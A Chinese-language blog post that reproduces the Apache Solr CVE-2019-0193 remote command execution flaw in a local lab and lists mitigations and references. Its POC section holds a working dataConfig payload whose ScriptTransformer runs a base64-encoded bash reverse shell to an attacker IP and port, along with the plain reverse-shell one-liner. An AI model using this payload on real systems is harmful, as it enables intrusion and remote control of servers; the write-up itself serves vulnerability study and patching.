<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    Apache Solr远程命令执行漏洞 |  觉觉
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/images/cg.jpg" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">
  
<link rel="stylesheet" href="/css/custom.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  

<link rel="alternate" href="/atom.xml" title="觉觉" type="application/atom+xml">
</head>

</html>

<body>
  <div id="app">
    
      
      <canvas width="1777" height="841"
        style="position: fixed; left: 0px; top: 0px; z-index: 99999; pointer-events: none;"></canvas>
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-漏洞复现② Solr RCE"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  Apache Solr远程命令执行漏洞
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/04/22/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E2%91%A1%20Solr%20RCE/" class="article-date">
  <time datetime="2021-04-22T04:22:10.000Z" itemprop="datePublished">2021-04-22</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">1.5k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">6 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <p><strong>漏洞编号</strong>：CVE-2019-0193</p>
<p><strong>Solr</strong>：独立的企业级搜索应用服务器。使用java语言开发。</p>
<p><strong>DataImportHandler</strong>：一个可选模块，用于从数据库和其他来源提取数据，其功能是整个DIH配置可以来自请求的<code>dataConfig</code>参数。DIH管理员屏幕的调试模式使用它可以方便地调试/开发DIH配置。</p>
<p><strong>dataConfig</strong>：数据配置管理。需要满足一定语法。其中<code>ScriptTransformer</code>可以编写自定义脚本，支持常见的脚本语言如<code>Javascript</code>、<code>JRuby</code>、<code>Jython</code>、<code>Groovy</code>和<code>BeanShell</code>。</p>
<p><strong>ScriptTransformer</strong>：脚本转换器，允许使用java支持的任何脚本语言。函数应当以行（类型为Map&lt;String,Object&gt;）为参数，可以修改字段。脚本应当写在数据仓库配置文件顶级的script元素内，而转换器属性值为script:函数名。</p>
<p><strong>DIH</strong>：数据库数据导入配置。</p>
<p><strong>DataSource</strong>：数据源，定义了即将导入Solr的外部数据的位置。</p>
<p><strong>UrlDataSource</strong>：数据源为URL地址。即导入Solr的数据来自<code>HTTP响应</code>，如RSS订阅源、atom订阅源、结构化的XML等。</p>
<p><strong>Entity</strong>：实体。作用是被处理后生成Solr中的一组文档，包含多个字段（fields），这些字段用各种方式转换之后发送到Solr进行索引。</p>
<p><strong>Processor</strong>：实体处理器。从外部数据源中提取数据内容，转换数据内容并将其添加到Solr索引中，可以编写<code>自定义实体处理器</code>来扩展或替换已提供的处理器。</p>
<p><strong>Transformer</strong>：转换器。从外部数据源中获取的每一组字段，都可以选择性被转换器转换。此转换过程可以修改字段、创建新字段、或从单行生成多个rows/documents。</p>
<h5 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h5><p>Apache Solr &lt; 8.2.0</p>
<h5 id="产生原因"><a href="#产生原因" class="headerlink" title="产生原因"></a>产生原因</h5><p>DIH配置可以包含脚本，因此<code>dataConfig</code>参数存在安全风险。</p>
<h5 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h5><p>下载：<a target="_blank" rel="noopener" href="https://archive.apache.org/dist/lucene/solr/8.1.1/">https://archive.apache.org/dist/lucene/solr/8.1.1/</a> </p>
<p>（本文使用kali安装，下载tgz文件）</p>
<p>解压：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ar zxvf solr-8.1.1.tgz </span><br></pre></td></tr></table></figure>

<p>切换到solr中的bin目录，启动solr：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./solr start</span><br></pre></td></tr></table></figure>

<p>访问localhost:8983/solr</p>
<p><img src="https://i.loli.net/2021/04/28/r3mI87uLeX1Abxo.png"></p>
<p>环境搭建成功。</p>
<h5 id="漏洞测试"><a href="#漏洞测试" class="headerlink" title="漏洞测试"></a>漏洞测试</h5><p>创建一个core：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./solr create -c test3</span><br></pre></td></tr></table></figure>

<p>选择刚刚创建的core。</p>
<p>可以看到存在<code>DataImportHandler</code>模块，受该漏洞影响。</p>
<p><img src="https://i.loli.net/2021/04/29/iazk8CDHGOfLxUQ.png" alt="image-20210429145648244"></p>
<p>获取Solr中所有core的信息，可以看到core_name：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost:8983&#x2F;solr&#x2F;admin&#x2F;cores</span><br></pre></td></tr></table></figure>



<h5 id="复现过程"><a href="#复现过程" class="headerlink" title="复现过程"></a>复现过程</h5><p>点击<code>Dataimport</code>，如果报<code>The solrconfig.xml file for this index does not have an operational DataImportHandler defined!</code>错误，可以参考此文章解决：<a target="_blank" rel="noopener" href="https://blog.csdn.net/A_bad_horse/article/details/114261936">https://blog.csdn.net/A_bad_horse/article/details/114261936</a></p>
<ul>
<li><strong>勾选<code>Debug</code> ：为了有回显结果。</strong></li>
</ul>
<p><img src="https://i.loli.net/2021/04/30/Fw6HqxSrzc4laBY.png" alt="image-20210430093630565"></p>
<ul>
<li><p><strong>DataConfig信息：DataConfig中实体、字段标签有哪些属性取决于用了哪个处理器和转换器。</strong></p>
<p><code>&lt;document&gt;</code>中的<code>&lt;entity&gt;</code>实体标签里说明了该实体的属性：</p>
</li>
</ul>
<ol>
<li>属性<code>name</code>：必填，用于标识实体的唯一名称。</li>
<li>属性<code>processor</code>：可选项。默认值为<code>SqlEntityProcessor</code>，所以当数据源不是RDBMS时必须填写该项。对于<code>URLDataSource</code>类型的数据源而言，它的值必须为<code>XPathEntityProcessor</code>（根据官方说明只能使用XPathEntityProcessor对“URL的HTTP响应”做处理）。</li>
<li>属性<code>transformer</code>：可选项。填写格式为<code>transformer=&quot;script:&lt;function-name&gt;&quot;</code> 指定了转换数据时具体的Transformer需要执行的脚本函数的名称。</li>
<li>属性<code>forEach</code>：必填。值为Xpath表达式，用于划分记录。如果有多种类型的记录就用<code>|</code>符号把这些表达式分隔开。</li>
<li>属性<code>url</code>：值用于调用REST API的URL（可以模板化）。</li>
</ol>
<ul>
<li><strong>在<code>&lt;dataConfig&gt;</code>中的<code>&lt;script&gt;</code>标签中，写脚本函数。</strong></li>
</ul>
<ol>
<li><code>CDATA</code>区段中的文本会被解析器忽略。因为xml元素中“&lt;”和“&amp;”是非法的，某些文本（如JavaScript代码）包含大量非法字符。为了避免错误，可以将脚本代码定义为CDATA。</li>
<li><code>function</code>语句：声明一个函数。</li>
<li><code>java.lang.Runtime.getRuntime().exec()</code>：在java中调用操作系统的程序。在调用命令后就直接返回当前线程了。</li>
<li><code>bash -c</code>：bash从字符串中读入命令，如果字符串后还有变量就被设定为从$0开始的位置参数。</li>
<li><code>|</code>：管道符，前一个命令的输出作为后一个命令的输入。</li>
</ol>
<p>Linux nc反弹shell命令：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.242.128/6666 0&gt;&amp;1</span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!-- bash -i：产生一个交互式bash。bash是Linux的一个常见shell。 --&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- &gt;&amp; /dev/tcp/ip/port：建立TCP连接，并将标准输出和错误重定向到TCP连接。ip/port为攻击机的ip和端口。 --&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 0&gt;&amp;1：从TCP连接获取输入。0：攻击机的输入。1：命令执行的结果。 --&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 整个命令即把bash的输出重定向到攻击机的指定端口，则目标机上执行的指令都只在攻击机上回显。 --&gt;</span>    </span><br><span class="line"></span><br><span class="line">bash64编码结果：YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0Mi4xMjgvNjY2NiAwPiYx</span><br></pre></td></tr></table></figure>

<p><strong>POC</strong>：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dataConfig</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">dataSource</span> <span class="attr">type</span>=<span class="string">&quot;URLDataSource&quot;</span>/&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span>&gt;</span>&lt;![CDATA[</span><br><span class="line"><span class="javascript">          <span class="function"><span class="keyword">function</span> <span class="title">poc</span>(<span class="params"></span>)</span>&#123; java.lang.Runtime.getRuntime().exec(<span class="string">&quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0Mi4xMjgvNjY2NiAwPiYx&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span>);</span></span><br><span class="line">          &#125;</span><br><span class="line">  ]]&gt;<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">document</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">entity</span> <span class="attr">name</span>=<span class="string">&quot;stackoverflow&quot;</span></span></span><br><span class="line"><span class="tag">            <span class="attr">url</span>=<span class="string">&quot;https://stackoverflow.com/feeds/tag/solr&quot;</span></span></span><br><span class="line"><span class="tag">            <span class="attr">processor</span>=<span class="string">&quot;XPathEntityProcessor&quot;</span></span></span><br><span class="line"><span class="tag">            <span class="attr">forEach</span>=<span class="string">&quot;/feed&quot;</span></span></span><br><span class="line"><span class="tag">            <span class="attr">transformer</span>=<span class="string">&quot;script:poc&quot;</span> /&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">document</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dataConfig</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>在攻击机开启监听。</p>
<p><img src="https://i.loli.net/2021/04/30/sd1OWUYGLScXV25.png" alt="image-20210430113437402"></p>
<p>将POC填入，发送。</p>
<p><img src="https://i.loli.net/2021/04/30/LYUVk4vNBuyqlP7.png" alt="image-20210430113841243"></p>
<p>getshell。</p>
<p><img src="https://i.loli.net/2021/04/30/Hp7ONoRiKB1XbM2.png" alt="image-20210430114149910"></p>
<p><img src="https://i.loli.net/2021/04/30/lzONjAxbdPDpJu9.png" alt="image-20210430125348393"></p>
<h5 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h5><p>看这个：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5941">https://xz.aliyun.com/t/5941</a></p>
<h5 id="解决方法"><a href="#解决方法" class="headerlink" title="解决方法"></a>解决方法</h5><ul>
<li><p>从Solr的8.2.0版本开始，使用此参数需要将Java系统属性“ enable.dih.dataConfigParam”设置为true。升级到8.2.0或更高版本，默认情况下是安全的。</p>
</li>
<li><p>或者，编辑solrconfig.xml以配置所有DataImportHandler用法，并在“不变式”部分列出“ dataConfig”参数设置为空字符串。</p>
</li>
<li><p>确保配置了网络设置，以便只有受信任的流量才能与Solr通信，尤其是与DIH请求处理程序通信。这是所有Solr的最佳做法。</p>
</li>
</ul>
<h5 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h5><ul>
<li><a target="_blank" rel="noopener" href="https://issues.apache.org/jira/browse/SOLR-13669">https://issues.apache.org/jira/browse/SOLR-13669</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43583637/article/details/102875284">https://blog.csdn.net/weixin_43583637/article/details/102875284</a></li>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5941">https://xz.aliyun.com/t/5941</a></li>
<li><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/5965#toc-6">https://xz.aliyun.com/t/5965#toc-6</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_17204441/article/details/97341408">https://blog.csdn.net/qq_17204441/article/details/97341408</a></li>
</ul>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2021/04/22/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E2%91%A1%20Solr%20RCE/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/RCE/" rel="tag">RCE</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2021/04/25/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E2%91%A2%20Webmin%20RCE/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            Webmin远程代码执行漏洞
          
        </div>
      </a>
    
    
      <a href="/2021/03/27/%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E5%99%A8v1/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">目录扫描器v1</div>
      </a>
    
  </nav>

   
<!-- valine评论 -->
<div id="vcomments-box">
  <div id="vcomments"></div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#vcomments",
    app_id: "k2fcizBJnz3eH5ukXlqFbdIx-gzGzoHsz",
    app_key: "pSOGPPb8zt9HDc5fCGOBSPpO",
    path: window.location.pathname,
    avatar: "monsterid",
    placeholder: "要么评论，要么打钱o(´^｀)o",
    recordIP: true,
  });
  const infoEle = document.querySelector("#vcomments .info");
  if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
    infoEle.childNodes.forEach(function (item) {
      item.parentNode.removeChild(item);
    });
  }
</script>
<style>
  #vcomments-box {
    padding: 5px 30px;
  }

  @media screen and (max-width: 800px) {
    #vcomments-box {
      padding: 5px 0px;
    }
  }

  #vcomments-box #vcomments {
    background-color: #fff;
  }

  .v .vlist .vcard .vh {
    padding-right: 20px;
  }

  .v .vlist .vcard {
    padding-left: 10px;
  }
</style>

 
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2021
        <i class="ri-heart-fill heart_icon"></i> Shutup.
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/tz.jpg" alt="觉觉"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->


<script src="/js/clickBoom2.js"></script>


<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


<script src="/js/dz.js"></script>



    
  </div>
</body>

</html>